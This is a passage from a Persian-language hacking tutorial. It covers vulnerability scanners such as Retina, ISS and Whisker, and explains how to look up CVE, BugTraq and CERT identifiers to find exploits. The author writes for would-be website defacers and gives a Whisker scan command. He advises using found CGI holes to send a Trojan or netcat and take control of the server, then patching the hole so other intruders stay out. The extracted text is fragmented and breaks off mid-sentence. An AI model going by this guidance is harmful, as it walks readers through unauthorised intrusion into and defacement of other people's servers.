ﺁزﻣﺎیﺸﯽ در ﺏﺎرﻩ ﺷﻤﺎرﻩ ویﺮایﺶ و اﻃﻼﻋﺎت ﺏﺮﻧﺎﻣﻪ هﺎی ﮐﺎرﺏﺮدی و ﺱﺮویﺲ دهﻨﺪﻩ هﺎ ﮐﻪ ﻣﻤﮑﻦ اﺱﺖ ﻣﻔﻴﺪ ﺏﺎﺷﺪ اﻧﺠﺎم ﻣﻴﺪهﺪ. ایﻦ Scriptهﺎ ﺁزﻣﻮﻧﻬﺎیﯽ در ﻣﻮرد ﭘﺮوﺕﮑﻞ SNMPﺏﻪ ﻣﻨﻈﻮر ﮐﺸﻒ ﺡﻔﺮﻩ هﺎی ﻗﺎﺏﻞ اﺱﺘﻔﺎدﻩ اﻧﺠﺎم ﻣﻴﺪهﺪ. ایﻦ Scriptهﺎ ﺁزﻣﻮﻧﻬﺎیﯽ در ﻣﻮرد ﻗﺎﺏﻠﻴﺖ ﻧﻔﻮذ ﺏﺮﻧﺎﻣﻪ هﺎی CGIﺏﻪ ﻣﻨﻈﻮر ﻧﻔﻮذ در وب ﺱﺮور هﺎیﯽ هﻤﭽﻮن IISو Apacheو ﺏﺮﻧﺎﻣﻪ هﺎی ﮐﺎرﺏﺮدی ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺏﺎ FHPو Cold fusionو Front Page اﻧﺠﺎم ﻣﻴﺪهﺪ. ایﻦ Scriptهﺎ ﺁزﻣﻮﻧﻬﺎیﯽ درﺏﺎرﻩ روﺷﻬﺎی ﻏﻴﺮ ﻣﺠﺎز دﺱﺘﺮﺱﯽ ﺏﻪ ﻓﺎیﻠﻬﺎ از ﻃﺮیﻖ ﺱﺮویﺲ هﺎیﯽ NFSیﺎ HTTPیﺎ ...اﻧﺠﺎم ﻣﻴﺪهﺪ ایﻦ Scriptهﺎ ﺁزﻣﻮﻧﻬﺎیﯽ در ﻣﻮرد دﺱﺘﻴﺎﺏﯽ ﺏﻪ اﻃﻼﻋﺎت RPCو ﺱﺮویﺲ هﺎی ﻗﺎﺏﻞ ﻧﻔﻮذ ﺁن ﻣﺎﻧﻨﺪ mountdو ststdاﻧﺠﺎم ﻣﻴﺪهﺪ. ایﻦ Scriptهﺎ ﺁزﻣﻮﻧﻬﺎیﯽ را در ﺏﺎرﻩ دﺱﺖ رﺱﯽ از راﻩ دور ﺏﻪ ﺱﻴﺴﺘﻢ ﺕﺤﺖ ﻧﺎم ﮐﺎرﺏﺮ اﺻﻠﯽ اﻧﺠﺎم ﻣﻴﺪهﺪ. ایﻦ Scriptهﺎ ﺁزﻣﻮﻧﻬﺎیﯽ در ﺏﺎرﻩ ﭘﻴﮑﺮ ﺏﻨﺪی ﻧﺎدرﺱﺖ دیﻮار ﺁﺕﺶ اﻧﺠﺎم ﻣﻴﺪهﺪ. ایﻦ Scriptهﺎ ﺁزﻣﻮﻧﻬﺎی در ﻣﻮرد ﺱﺮویﺴﻬﺎی ﻣﻨﺴﻮخ ﺷﺪﻩ ای ﻣﺎﻧﻨﺪ echoو daytimeو rshو ...اﻧﺠﺎم ﻣﻴﺪهﺪ. ایﻦ اﺱﮑﺮیﭙﺖ هﺎ ﺁزﻣﻮﻧﻬﺎیﯽ را ﺏﻪ ﻣﻨﻈﻮر ﺕﺸﺨﻴﺺ ﺡﻤﻼﺕﯽ از ﻧﻮع DOSاﻧﺠﺎم ﻣﻴﺪهﺪ. ایﻦ Scriptهﺎ ﺁزﻣﻮﻧﻬﺎیﯽ در ﺏﺎرﻩ ﻧﻘﺎط ﺽﻌﻒ ﺏﺮﻧﺎﻣﻪ FTPاﻧﺠﺎم ﻣﻴﺪهﺪ. ایﻦ Scriptﺁزﻣﻮﻧﻬﺎیﯽ در ﻣﻮرد ﻗﺎﺏﻠﻴﺖ ﻧﻔﻮذ ﭘﺬیﺮی ﺏﻪ واﺱﻄﻪ ﺱﺮویﺲ NISﮐﻪ ﺕﻮﺱﻂ ﺷﺮﮐﺖ SUNﻋﺮﺽﻪ ﺷﺪﻩ اﺱﺖ اﻧﺠﺎم ﻣﻴﺪهﺪ. ایﻦ Scriptهﺎ ﺁزﻣﻮﻧﻬﺎیﯽ در ﺏﺎرﻩ اﺷﮑﺎﻻت ﭘﺮوﺕﮑﻞ ﭘﺴﺖ اﻟﮑﺘﺮوﻧﻴﮑﯽ اﻧﺠﺎم ﻣﻴﺪهﺪ. ایﻦ Scriptهﺎ ﺁزﻣﻮﻧﻬﺎیﯽ را درﺏﺎرﻩ ﺕﺸﺨﻴﺺ ﻣﺸﮑﻼت و ﻧﻘﺎط ﻗﺎﺏﻞ ﻧﻔﻮذ ﻣﻮﺟﻮد در راﺏﻄﻪ ﺏﺎ ﺡﺴﺎب ﮐﺎرﺏﺮان یﺎ ﮔﺮوﻩ هﺎی ﺕﻌﺮیﻒ ﺷﺪﻩ در ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ویﻨﺪوز اﻧﺠﺎم ﻣﻴﺪهﺪ.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٥٢
ﺏﻌﺪ از اﻧﺘﺨﺎب Scriptهﺎی ﻣﻮرد ﻋﻼﻗﻪ ﺧﻮد ﺏﻪ ﺏﺮﮔ ﻪ Prefsﻣﻴﺮوی ﺪ ﮐ ﻪ ﮔﺰیﻨ ﻪ ه ﺎ ﺁﻧﺠ ﺎ را ﻣ ﺸﺎﺏﻪ ﺏﺮﻧﺎﻣ ﻪ ه ﺎی ﺏ ﺎﻻ اﺱ ﺖ ﺏ ﻪ ﺧ ﺼﻮص Nmap اﺱﺖ .ﻓﻘﻂ یﮏ ﮔﺰیﻨﻪ ﻣﯽ ﻣﺎﻧﺪ ﮐﻪ در ﺏﺮﮔﻪ Scan Optionاﺱﺖ ﺏﺎ ﻧﺎم Scan for LaBrea tarpitted hostsﮐﻪ ﺡﺘﻤﺎ ﺁن را ﻓﻌﺎل ﮐﻨﻴﺪ .ای ﻦ ﮔﺰیﻨﻪ ﻣﮑﺎﻧﻴﺰﻣﯽ را ﮐﻪ دیﮕﺮ ﺡﻮﺻﻠﻪ ﺕﻮﺽﻴﺢ ﺁن را ﻧﺪارم ﻓﻌﺎل ﻣﻴﮑﻨﺪ ﮐﻪ ﻋﻠﻴﻪ ﺏﺮﻧﺎﻣﻪ دﻓﺎﻋﯽ LaBreaﺏﻪ ﮐﺎر ﻣﻴﺒ ﺮد ﮐ ﻪ ﺏ ﺴﻴﺎر ﺧ ﻮب اﺱ ﺖ .ای ﻦ ﺏﺮﻧﺎﻣﻪ LaBreaیﮏ ﺏﺮﻧﺎﻣﻪ دﻓﺎﻋﯽ ﻋﺎﻟﯽ و اﻟﺒﺘﻪ ارزان اﺱﺖ ﮐﻪ ﻣﻌﻤﻮﻻ اﮐﺜﺮ ﻣﺎﺷﻴﻨﻬﺎی روی ﺷﺒﮑﻪ دارﻧﺪ. در ﺏﺮﮔﻪ Target Selectionﺷﻤﺎ IPه ﺪف را وارد ﻣﻴﮑﻨﻴ ﺪ و ﺏﻌ ﺪ دﮐﻤ ﻪ Start the scanرا ﻓ ﺸﺎر ﻣﻴﺪهﻴ ﺪ ﺧ ﻮب ﺏﺮﻧﺎﻣ ﻪ ﺏﻌ ﺪ از ﻣ ﺪﺕﯽ ﺏ ﻪ ﺷ ﻤﺎ ﺟﻮاب ﻣﻴﺪهﺪ ﮐﻪ ﻣﻴﺘﻮاﻧﺪ در ﻓﺮﻣﺖ HTMLو TXTﺏﺎﺷﺪ ﮐﻨﺎر هﺮ ﺡﻔﺮﻩ ای ﮐﻪ ﮐﺸﻒ ﮐﺮدﻩ یﮏ ﺱﺮی ﺷﻤﺎرﻩ اﺱﺖ و ...ﮐﻪ در ﻣﻮرد ﮐﺎرایﯽ ه ﺮ ﮐﺪام ﺏﻌﺪا ﮐﺎﻣﻞ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ . ﺏﺮﻧﺎﻣﻪ : Retina ﺧﻮب اﺏﺰار ﺏﻌﺪی ﮐﻪ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ ﺏﺮﻧﺎﻣﻪ Retinaاﺱﺖ ﮐﻪ ﻓﮑﺮ ﻣﻴﮑﻨﻢ ﺁﺧﺮیﻦ ﻧﺴﺨﻪ ﺁن ۵٫٢ﺏﺎﺷﺪ ایﻦ ﺷﮑﻞ ﻧﺴﺨﻪ ۴٫٩٫٨اﺱﺖ ﮐﻪ ایﻦ ﺷﮑﻠﯽ :
ﮐﺎر ﺏﺎ ایﻦ ﺏﺮﻧﺎﻣﻪ ﺱﺎدﻩ اﺱﺖ و اﻟﺒﺘﻪ ﭘﻴﮏ ﺏﻨﺪی ﺁﺱﺎﻧﯽ ﻧﻴﺰ دارد ﺏﺮای ایﻦ ﻣﻨﻈﻮر ﺏﻪ ﻣﻨﻮی ﮐﺮﮐﺮﻩ ای Toolsرﻓﺘ ﻪ و ﮔﺰیﻨ ﻪ Optionsرا اﻧﺘﺨ ﺎب ﮐﻨﻴﺪ ﺕﺎ ﮐﺎدری را ﮐﻪ در ﺷﮑﻞ ﺏﺎﻻ ﻣﺸﺎهﺪﻩ ﻣﻴﮑﻨﻴﺪ ﺏﺒﻴﻨﻴﺪ .ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴﺪ در ایﻦ ﭘﻨﺠﺮﻩ ﺱﺮﻋﺖ ﺏﺮﻧﺎﻣ ﻪ را ﮐ ﻢ زی ﺎد ﮐﻨﻴ ﺪ ﮐ ﻪ ﺏ ﺎ ﻧﺘ ﺎیﺞ راﺏﻄ ﻪ ﻣ ﺴﺘﻘﻴﻤﯽ دارد ﺱﺮﻋﺖ زیﺎد ﺟﻮاب ﺧﻮﺏﯽ ﻧﻤﻴﺪهﺪ ﺱﺮﻋﺖ ﮐﻢ هﻢ ﺡﻮﺻﻠﻪ ﺁن را ﺱﺮﻣﯽ ﺏﺮد ﺡﺴﺎﺱﻴﺖ ﺏﺮﻧﺎﻣﻪ و ...را ﺕﻨﻈﻴﻢ ﮐﻨﻴﺪ و اﻟﺒﺘﻪ ه ﻢ اﻣﮑ ﺎن اﺕﻮﻣﺎﺱ ﻴﻮن ﻧﻴﺰ ﻣﻮﺟﺪ ﻣﻴﺒﺎﺷﺪ .اﻟﺒﺘﻪ ﮔﺰیﻨﻪ هﺎیﯽ هﻢ در ﺏﺎرﻩ ﻧﻮع ﻗﺎﻟﺐ ﭘﺎﺱﺦ و ...هﻢ ﻣﻮﺟﺪ اﺱﺖ ﺏﻘﻴﻪ ﮐﺎرا ﺏﺎ ﺧﻮدﺕﺎن . ایﻦ ﮐﻪ ﺡﺘﻤﺎ ﻣﻴﺪاﻧﻴﺪ ﺁدرس Ipو یﺎ ﺁدرس ﺱﺎیﺖ را ﺏﺎیﺪ در ﻣﻘﺎﺏﻞ ﮔﺰیﻨﻪ Addressﺏﻨﻮیﺴﻴﺪ !!! ﺏﺮﻧﺎﻣﻪ ISSو یﺎ ﻧﺎم ﮐﺎﻣﻞ : Internet Security System ﮐﺎر ﺏﺎ ایﻦ ﺏﺮﻧﺎﻣﻪ ﺱﺎدﻩ اﺱﺖ ﮐﺎرای ﺏﺪی هﻢ ﻧﺪارد ﺱﻴﻤﺎی ﺏﺮﻧﺎﻣﻪ ایﻦ ﺷﮑﻠﯽ اﺱﺖ ﻧﺴﺨﻪ ۶٫٢ﮐﻪ ﻗﺪیﻤﯽ اﺱﺖ :
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٥٣
ﺧﻮب ایﻦ از ﻣﻌﺮﻓﯽ اﺏﺰارهﺎی ﭘﻮیﺶ ﻧﻘﺎط ﺁﺱﻴﺐ ﭘﺬیﺮی .ایﻦ را ﺏﺎیﺪ اول ﻣﻴﮕﻔﺘﻢ ،ایﻦ اﺏﺰار هﺎ هﻤﺎﻧﻄﻮر ﮐﻪ ﻓﻬﻤﻴﺪیﺪ یﮏ ﺱﺮی ﻓﺎیﻞ دارﻧ ﺪ ﮐ ﻪ ﺏ ﺎ ﺕﺴﺖ ﺁﻧﻬﺎ ﻣﯽ ﻓﻬﻤﻨﺪ ﺁیﺎ ایﻦ ﺡﻔﺮﻩ ﻗﺎﺏﻞ اﺱﺘﻔﺎدﻩ اﺱﺖ یﺎ ﻧﻪ یﮏ دﻓﻌﻪ ﺧﺪای ﻧﮑﺮدﻩ ﻓﮑﺮ دیﮕﻪ ایﯽ ﻧﮑﻨﻴﺪ ﮐﻪ ﻣﺜﻼ ایﻨﻬﺎ از ﺧﻮدﺷﻮن ﮐﺸﻒ ﻣﻴﮑﻨﻨ ﺪ ﺡﻔ ﺮﻩ را ﮐﻪ ﺁﺏﺮوی ﻣﺎ و ﺧﻮدﺕﺎن را یﮏ ﺟﺎ ﺏﻪ ﺁب روان و ﭘﺎک ﺏﺴﭙﺎریﺪ. ﺧﻮب ﺡﺘﻤﺎ ﺏﺎ ایﻦ اﺏﺰار هﺎ ﮐﻪ ﻣﻌﺮﻓﯽ ﮐﺮدم ﺏﻪ ﺷﻤﺎ ،ﺏﻌﺪ از ﻋﻤﻞ ﭘﻮیﺶ یﮏ ﺱﺮی ﺟﻮاب ﻣﻴﺪهﺪ ﮐﻪ ﻣﻌﻤﻮﻻ ﺱﺮویﺲ هﺎی روی ﭘﻮرت هﺎی ﺏ ﺎز و ﺡﻔﺮﻩ هﺎی اﻣﻨﻴﺘﯽ ﻗﺎﺏﻞ اﺱﺘﻔﺎدﻩ در ﻗﺎﻟﺐ درﺟﺎت ﺧﻄﺮﻧﺎک و ﻣﺘﻮﺱﻂ و ﭘﺎیﻴﻦ و یﮏ ﺱﺮی ﺷﻤﺎرﻩ در ﭘﺎیﻴﻦ ﺁﻧﻬﺎ ،ﻣﺎ ﺏﺮای اﺱ ﺘﻔﺎدﻩ از ای ﻦ ﺷ ﻤﺎرﻩ ه ﺎ ﮐﻪ ﻧﺎم ﺁن ﺡﻔﺮﻩ اﺱﺖ از ﻧﻈﺮ ﻣﺘﺨﺼﺼﻴﻦ و ﺱﺎیﺘﻬﺎی اﻣﻨﻴﺘﯽ ) ﺏﺮای ﻃﺒﻘﻪ ﺏﻨﺪی و ( ...ﮐﻪ در ﻗﺎﻟﺒﻬﺎی ﻣﺨﺘﻠﻔﯽ ﻧﻴﺰ هﻢ اﺱﺖ .اﻟﺒﺘﻪ ﺷﻤﺎ ﺏﺎ ایﻦ ﺷﻤﺎرﻩ هﺎ ﻣﻄﺎﻟﺒﯽ در ﺏﺎرﻩ ﺁن ﺡﻔﺮﻩ ﻣﯽ ﺁﻣﻮزیﺪ و اﮔﺮ ﺡﻔﺮﻩ ﻗﺎﺏﻞ ﺏﻬﺮﻩ ﺏﺮداری ﻧﻴﺰ ﺏﺎﺷﺪ ﺏﻪ اﺡﺘﻤﺎل زیﺎد ﭼﻨﺪ ﺕﺎ Exploitﺏﺮای ﺁن ﭘﻴﺪا ﻣﻴﮑﻨﻴﺪ. اوﻟﻴﻦ ﻗﺎﻟﺐ CVEو : CAN ایﻦ ﻗﺎﻟﺐ ﺷﻤﺎرﻩ ﮔﺬاری یﺎ ﻧﺎم ﮔﺬاری ﺡﻔﺮﻩ ه ﺎی اﻣﻨﻴﺘ ﯽ ﮐ ﻪ ﺷ ﺎﻣﻞ ی ﮏ ﻋ ﺪد اﺱ ﺖ ﮐ ﻪ ﺏ ﺎ ﻋﺒ ﺎرت CVEو ی ﺎ CANﺷ ﺮوع ﻣﻴ ﺸﻮد ،ﻣﻴﺘﻮاﻧﻴ ﺪ ﺏ ﻪ ﺱﺎیﺖ هﺎی زیﺮ ﻣﺮاﺟﻌﻪ ﮐﺮدﻩ و درﺏﺎرﻩ ﺁﻧﻬﺎ اﻃﻼﻋﺎت ﺏﮕﻴﺮیﺪ : http://www.iss.net/security_center/advice/Concordance/CVE/default.htm http://www.securityfocus.com/ http://www.securitytracker.com/ http://www.xfocus.org/ ﺏﺮای ﻣﺸﺎهﺪﻩ اﻃﻼﻋﺎت در ﺏﺎرﻩ ایﻦ ﻋﺪد ﺏﻪ ﺱﺎیﺘﻬﺎی ﺏﺎﻻ ﻣﺮاﺟﻌﻪ ﮐﺮدﻩ و ﺏﻪ ﻗﺴﻤﺖ Vulnerabilityﺱﺎیﺖ رﻓﺘﻪ و ﺏﺎ وارد ﮐﺮدن ﺷﻤﺎرﻩ CVEیﺎ CANﻣﻄﺎﻟﺒﯽ در ﺏﺎرﻩ ﺁن ﺏﯽ ﺁﻣﻮزیﺪ و اﺡﻴﺎﻧﺎ Exploitهﻢ ﺏﺮای اﺱﺘﻔﺎدﻩ از ﺁن ﺡﻔﺮﻩ اﻣﻨﻴﺘﯽ ﭘﻴﺪا ﮐﻨﻴﺪ .و ﺏﺎ ﺕﻮﺟﻪ ﺏ ﻪ ﺁن Exploitﺡﻤﻠ ﻪ را ﺁﻏ ﺎز ﮐﻨﻴﺪ. اﮔﺮ ﻣﯽ ﺧﻮاهﻴﺪ ﮐﺎر ﺷﻤﺎ یﮏ ﮐﻤﯽ ﺱﺮ راﺱﺖ ﺕﺮ ﺷﻮد ﻣﻴﺘﻮاﻧﻴﺪ ﺏﻪ ﺁدرس زیﺮ ﺏﺮویﺪ و ﺏﻪ ﺟﺎی xهﺎ ﺷﻤﺎرﻩ را هﻤﺮاﻩ ﻋﺒﺎرت هﻤﺮاﻩ ﺁن ﺏﻨﻮیﺴﻴﺪ. http://cve.mitre.org/cgi-bin/cvename.cgi?name=xxxxxxxxxxxxx http://cgi.nessus.org/cve.php3?cve=xxxxxxxxxxx ﺧﻮب ﺏﻌﺪ از ایﻦ ﮐﺎر ﺷﺎیﺪ دوﺏﺎرﻩ یﮏ ﺱ ﺮی ﺷ ﻤﺎرﻩ ﻣﻌ ﺎدل ﺏ ﺎ ﻓﺮﻣ ﺖ ﻧ ﺎم ﮔ ﺰاری ﻣﺨﺘﻠ ﻒ را ﺏ ﻪ ﺷ ﻤﺎ ﺏﻌ ﻼوﻩ یﮑ ﺴﺮی ﻣﻄﻠ ﺐ در ﺟ ﻮاب ﺏﺪه ﺪ ﮐ ﻪ ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ هﻢ را ﻣﻄﺎﻟﻌﻪ ﮐﻨﻴﺪ. ﻗﺎﻟﺐ BIDیﺎ : Bug Traq ﺏﺮای ﻣﺸﺎهﺪﻩ ﺕﻮﺽﻴﺤﺎت ایﻦ ﻗﺎﻟﺐ ﻣﻴﺘﻮاﻧﻴﺪ از ﺁدرس زیﺮ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ http://www.securityfocus.com/bid/xxxx ﮐﻪ ﺏﻪ ﺟﺎی واژﻩ هﺎی xﺏﺎیﺪ ﻓﻘﻂ ﺷﻤﺎرﻩ را وارد ﮐﻨﻴﺪ .هﻤﻴﻦ !!
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٥٤
ﻗﺎﻟﺐ CAیﺎ : CERT ایﻦ هﻢ یﮏ ﻧﻮع ﻗﺎﻟﺐ اﺱﺖ ﮐﻪ ﺏﺮای دیﺪن ﺕﻮﺽﻴﺤﺎت ﺁن ﺏﻪ ﺁدرس زیﺮ ﻣﺮاﺟﻌﻪ ﻣﻴﮑﻨﻴﻢ و ﺏﻪ ﺟﺎی xهﺎ ﺕﻤﺎم ﻋﺒﺎرت ﺏﺎ ﭘﻴﺸﻮﻧﺪ ﺁن را ﻣﻴﻨﻮیﺴﻴﻢ : http://www.cert.org/advisorise/xxxxxxxxxx.html ﻗﺎﻟﺐ : XF در ایﻦ ﻗﺎﻟﺐ ﻣﯽ ﺕﻮاﻧﻴﺪ ﺕﻮﺽﻴﺤﺎت ﻣﺮﺏﻮﻃﻪ را از ﺁدرس زیﺮ ﺏﺪﺱﺖ ﺁوریﺪ. http://www.iss.net/security_center/search.php ﺧﻮب ایﻦ هﻢ از ایﻦ ،ﺏﻪ ﻧﻈﺮ ﻣﻦ ﺏﻬﺘﺮ ایﻦ ﺟﺎ ﺱﺎیﺖ iss.netو ﺱﺎیﺖ securityfocus.comاﺱﺖ ﺏﺮای ﮔﺸﺘﻦ ﺏﻪ دﻧﺒﺎل ﺡﻔﺮﻩ ه ﺎی اﻣﻨﻴﺘ ﯽ ،ﮐ ﻪ ﺷﻤﺎ در ﺱﺎیﺖ securityfocus.comﻣﻴﺘﻮاﻧﻴﺪ راﻩ ﺡﻞ ﺏﺮ ﻃﺮف ﮐﺮدن ایﻦ ﺡﻔﺮﻩ ) ﺏﺎ ایﻦ ﮐﺎر ﺏﻌﺪ از ﻧﻔﻮذ ﺧﻮد ﺏﺎﻋﺚ ﻣﻴﺸﻮیﺪ ﮐ ﻪ ﺷ ﺨﺺ دیﮕ ﺮی از راﻩ ای ﯽ ﮐ ﻪ ﺷ ﻤﺎ ﺁﻣ ﺪﻩ ای ﺪ وارد ﻧ ﺸﻮد و ﮐ ﺎر ﺷ ﻤﺎ را ﺧ ﺮاب ﻧﮑﻨ ﺪ ﺏ ﺎ ﻧﺎﺷ ﯽ ﺏ ﺎزی اش !! ( و ﮐ ﺪ ﺏﺮﻧﺎﻣ ﻪ ﺏﻬ ﺮﻩ ﺏ ﺮداری از ای ﻦ ﺡﻔ ﺮﻩ و ﻣﻄﺎﻟ ﺐ ﺁﻣﻮزﻧﺪﻩ و ﺷﻤﺎرﻩ و ﻗﺎﻟﺐ ﻣﻌﺪل ﺁن را ﺏﺪﺱﺖ ﺁوریﺪ ،اﻟﺒﺘ ﻪ ﺏﻬﺘ ﺮیﻦ ﮐ ﺎر وارد ﮐ ﺮدن ﻗﺎﻟ ﺐ و ﺷ ﻤﺎرﻩ ﺁن هﻤ ﺮاﻩ ﮐﻠﻴ ﺪ واژﻩ ه ﺎی ﻣ ﻮرد ﻧﻈ ﺮ ﺧ ﻮد در ﺟﺴﺘﺠﻮﮔﺮ Googleاﺱﺖ ﮐﻪ ﺏﺮای ﺷﻤﺎ ﻧﺘﺎیﺞ زیﺎدی را ﺏﺪﺱﺖ ﻣﯽ ﺁورد. ﭘﻮیﺶ ﺏﺮﻧﺎﻣﻪ هﺎی ﮐﺎرﺏﺮدی ﺕﺤﺖ وب ﺏﺮای ﮐﺸﻒ ﺡﻔﺮﻩ هﺎی ﺁﺱﻴﺐ ﭘﺬیﺮ : ﺧﻮب در ایﻦ ﺏﺎرﻩ یﮏ ﻣﻄﻠﺐ دیﮕﺮ اﺱﺖ ﮐﻪ ﻓﻘﻂ ﻣﺮﺏﻮط ﺏﻪ ﮐﺸﻒ ﺡﻔﺮﻩ هﺎی ﺏﺮﻧﺎﻣﻪ هﺎی ﺕﺤﺖ وب ﻣﻴ ﺸﻮد ﮐ ﻪ ﺕﻮﺽ ﻴﺢ ﻣﻴ ﺪهﻢ ) ﺏ ﺮای ﮐ ﺴﺎﻧﯽ ﮐ ﻪ ﺧﻮرﻩ Deificﮐﺮدن ﺻﻔﺤﻪ ﺱﺎیﺖ هﺎ هﺴﺘﻨﺪ دارم ﻣﻴﮕﻮیﻢ !! ( . ﻣﺎ در ایﻦ ﮐﺎر اول ﻣﺎﺷﻴﻨﯽ ﮐﻪ وﻇﻴﻔﻪ ﺱﺮویﺲ دهﻨﺪﻩ وب را ﺏ ﺮ ﻋ ﺪﻩ دارد را ﺏ ﺎ روﺷ ﻬﺎی ﮔ ﺎم اول ﮐ ﺸﻒ ﮐ ﺮدﻩ ﺏﻌ ﺪ ی ﮏ راﺱ ﺖ اﮔ ﺮ دل ﺧﻮدﺕ ﺎن ﺧﻮاﺱﺖ ﻣﯽ ﺁیﻴﺪ ﺏﻪ ایﻦ ﻣﺮﺡﻠﻪ اﮔﺮ وﺱﻮاﺱﯽ هﺴﺘﻴﺪ ﮔﺎم دوم را هﻢ اﻧﺠﺎم دهﻴﺪ اﮔﺮ ﻣﻴﺨﻮاهﻴﺪ %١٠٠ﻣﻮﻓﻖ ﺷﻮیﺪ ﮔﺎم ﺱﻮم ه ﻢ را اﻧﺠ ﺎم دهﻴ ﺪ ) ای ﻦ هﻤﻴﻦ ﺟﺎ ﺏﮕﻮیﻢ ﺕﻤﺎم ﺏﺮﻧﺎﻣﻪ هﺎیﯽ ﮐﻪ در ﮔﺎم ﺱﻮم ﻣﻌﺮﻓﯽ ﮐﺮدم ایﻦ ﻧﻮع ﭘﻮیﺶ ﺧﺎص را ﮐﻪ ﺡﺎﻻ دارم ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ اﻧﺠﺎم ﻣﻴﺪهﻨﺪ (. اﺻﻮل ﮐﺎر در ایﻦ روش ﻓﻘﻂ ﺡﻤﻠﻪ ﺏﻪ ﺏﺮﻧﺎﻣﻪ ﺱﺮویﺲ دهﻨﺪﻩ وب اﺱﺖ ﻣﺜﻞ IISو Apacheو iPlanetو... ﻣﻌﺮﻓﯽ اﺏﺰار : Whisker ﻣﻌﺮوف ﺕﺮیﻦ ﺏﺮﻧﺎﻣﻪ ﺏﺮای ایﻦ ﮐﺎر Whiskerاﺱﺖ ﮐﻪ ﺏﺮای ﺧﺎﻧﻮادﻩ Unixاﺱﺖ ﻧﻪ ﺏﺒﺨﺸﻴﺪ ﺏ ﺎ ی ﮏ ﻣﻔ ﺴﺮ Perlﺏ ﺮای ویﻨ ﺪوز ه ﻢ ﻗﺎﺏ ﻞ اﺱ ﺘﻔﺎدﻩ ﻣﻴﺸﻮد .ﺏﺮای اﺱﺘﻔﺎدﻩ از ایﻦ دﺱﺘﻮر در ﺧﻂ ﻓﺮﻣﺎن ﻣﺤﻴﻂ ﻟﻴﻨﻮﮐﺲ هﺎ یﺎ هﻤﺎن Shellاﺻﻄﻼﺡﺎ دﺱﺘﻮر زیﺮ را ﻣﯽ ﻧﻮیﺴﻴﻢ : $ whisker.pl –h xxx.xxx.xxx.xxx –vv –W | tee ﺧﻮب ایﻦ اول ﺏﺎیﺪ ﻣﻴﮕﻔﺘﻢ ﮐﻪ اﻻن ﻣﻴﮕﻢ ﺏﺒﺨﺸﻴﺪ !! ﺱﻮیﭻ هﺎی ﻣﺘﺪاول ایﻦ ﺏﺮﻧﺎﻣﻪ: هﻨﮕﺎﻣﯽ ﮐﻪ ﺏﺨﻮاهﻴﻢ از ﻧﺎم ﻣﻴﺰﺏﺎن یﺎ ﺷﻤﺎرﻩ IPﺁن اﺱﺘﻔﺎدﻩ ﮐﻨﻴﻢ از ﺱﻮیﭻ –hﺡﺘﻤﺎ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ !! اﮔﺮ ﺏﺨﻮاهﻴﻢ ﻟﻴﺴﺘﯽ از ﻣﻴﺰﺏﺎن هﺎ و یﺎ ﺷﻤﺎرﻩ IPرا ﺏﻪ ﺏﺮﻧﺎﻣﻪ ﺏﺪهﻴﻢ از ﺱﻮیﭻ –Hاﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ . ﺱﻮیﭻ –vvﺏﺎﻋﺚ ﺙﺒﺖ ﻧﺘﺎیﺞ ﭘﻮیﺶ ﺡﻔﺮﻩ هﺎ ﻣﻴﺸﻮد. ﺱﻮیﭻ –Wﺏﺎﻋﺚ ﻣﻴﺸﻮد ﻧﺘﺎیﺞ در ﻗﺎﻟﺐ HTMLذﺧﻴﺮﻩ ﺷﻮد . ﺱﻮیﭻ –lﺏﺎﻋﺚ ﻣﻴﺸﻮد ﮐﻪ هﻤﻴﺸﻪ ﻧﺘﺎیﺞ در ﻓﺎیﻠﯽ ﮐﻪ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻴﺪ ﺙﺒﺖ ﺷﻮد ) .ﺕﻮﺻﻴﻪ ﻣﻦ ﺏﻪ ﺷﻤﺎ :ﺏﻪ ﻧﺪرت اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ !!( ﺱﻮیﭻ –xﺏﺎﻋﺚ اﺱﺘﻔﺎدﻩ از SSLﻣﻴﺸﻮد) .ﺏﺮای وب ﺱﺎیﺖ هﺎیﯽ ﮐﻪ از SSLاﺱﺘﻔﺎدﻩ ﻣﯽ ﮐﻨﻨﺪ ( ) ایﻦ ﺱﻮیﭻ را ﺏﺎیﺪ ﻗﺒﻞ از ﺱﻮیﭻ –hﺏﮕﺰاریﺪ( ﺧﻮب هﻤﻴﻦ هﺎ اﺱﺖ ﺷﻤﺎ ﺏﺎیﺪ دﻧﺒﺎل ﺁن ﺟﻮاب هﺎیﯽ ﺏﮕﺮدیﺪ ﮐﻪ 200 OKﺟﻠﻮی ﺁﻧﻬﺎ اﺱﺖ و ﺕﺮﺟﻴﺤﺎ در ﺷﺎﺧﻪ Scriptهﺴﺘﻨﺪ و ﺏﺎ اﺱﺘﻔﺎدﻩ از ﮐ ﺪی ﮐﻪ ﺟﻠﻮی ﺁن اﺱﺖ ﺏﺎ ارﺱﺎل یﮏ اﺱﺐ ﺕﺮﺁوا و یﺎ NCو ...ﺏﭙﺮدازیﺪ و ﺱﺮویﺲ دهﻨﺪﻩ را ﮐﻨﺘﺮل ﺁن را ﺏﺪﺱﺖ ﺏﮕﻴﺮیﺪ. ﻓﻘﻂ ایﻦ ﺏﮕﻢ ﮐﻪ ﺁﻧﻬﺎیﯽ ﮐﻪ ﻟﻴﻨﻮﮐﺲ 